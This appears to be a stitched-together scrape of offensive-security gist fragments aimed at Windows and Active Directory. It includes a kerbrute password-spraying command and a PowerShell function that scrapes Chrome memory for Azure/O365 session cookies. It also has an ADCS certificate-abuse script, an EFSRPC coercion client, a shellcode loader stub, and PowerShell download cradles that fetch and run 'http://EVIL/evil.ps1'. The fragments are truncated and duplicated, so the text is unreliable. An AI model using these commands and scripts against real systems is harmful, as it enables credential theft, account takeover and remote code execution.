With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# This scriplet relies on https://github.com/glmcdona/strings2 | |
# Import the script: PS> import-module .\Process_String_Extractor.ps1 | |
# Run the function: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname notepad -SearchString "Hello World" | |
# To extract Cookies for O365 / Azure PTC Attack: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname chrome -SearchString "ESTSAUTH","SignInStateCookie" | |
function ScrapeProcessMemory { | |
Param( | |
[Parameter(Mandatory)] | |
[string]$Processname, | |
[Parameter(Mandatory)] |
#Thank you @NotMedic for troubleshooting/validating stuff! | |
$password = Read-Host -Prompt "Enter Password" | |
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
$CASERVER = "alexlab-dc01-ca" #CA name. | |
$CA = $CAFQDN + "\" + $CASERVER |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
Install-Module NtObjectManager | |
Import-Module NtObjectManager | |
$Servers = Get-RpcServer -Path C:\Windows\system32\efssvc.dll ` | |
-DbgHelpPath 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll' | |
$EfsInterace = $Servers | Where-Object { $_.InterfaceId -eq 'df1941c5-fe89-4e79-bf10-463657acf44d' } | |
$client = Get-RpcClient -Server $EfsInterace | |
$client.Connect() |
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
#!/usr/bin/python | |
''' | |
$ python sniffCert.py -h | |
Usage: sniffCert.py [options] | |
Options: | |
-h, --help show this help message and exit | |
-i INTERFACENO Interface to sniff | |
$ python sniffCert.py -i en0 |
function Invoke-SMBShellcodeLoad { | |
<# | |
.SYNOPSIS | |
Short description | |
.DESCRIPTION | |
Long description | |
.EXAMPLE | |
An example |
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |